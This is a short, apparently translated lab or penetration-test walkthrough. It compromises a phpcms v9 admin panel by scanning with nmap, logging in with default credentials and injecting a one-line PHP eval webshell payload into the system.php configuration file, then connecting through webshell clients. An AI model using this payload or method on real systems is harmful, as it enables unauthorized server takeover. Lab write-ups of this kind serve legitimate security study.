Port scan: nmap -sV -v -A 192.168.206.129
According to the scan information, it is inferred that the background of phpcms is admin.php, the major version is v9
Use kali's searchsploit to search for vulnerabilities in phpcms
Try to use the blind SQL injection in this version 9.0
But after testing, there is no such SQL injection vulnerability
Use the background information obtained from the robots.txt file to access the background
Then try the default password of phpcms phpcms phpcms successfully log in to the background
Online information search, there is a configuration file getshell in the background
The key value will be written directly to the \phpcms\caches\configs\system.php configuration file. The most important thing about the configuration file getshell is to close it. If you write a sentence directly, the Trojan will become a value of the key, so you need to use a comma, The comment characters and other symbols are closed. After many tests, the following is the payload that can be written directly:
\',@eval($_POST[123]),//
Visit after submission, you can parse
When using a chopper to connect, the connection fails. Using Ant Sword also fails to connect. What's the matter? The PHP version of the website is not too high, what's the matter? ? ?
It turns out that my tool is too old. Some key things have been deleted by my computer’s security software, so I can’t use it anymore. I asked a friend for a c-knife and successfully connected.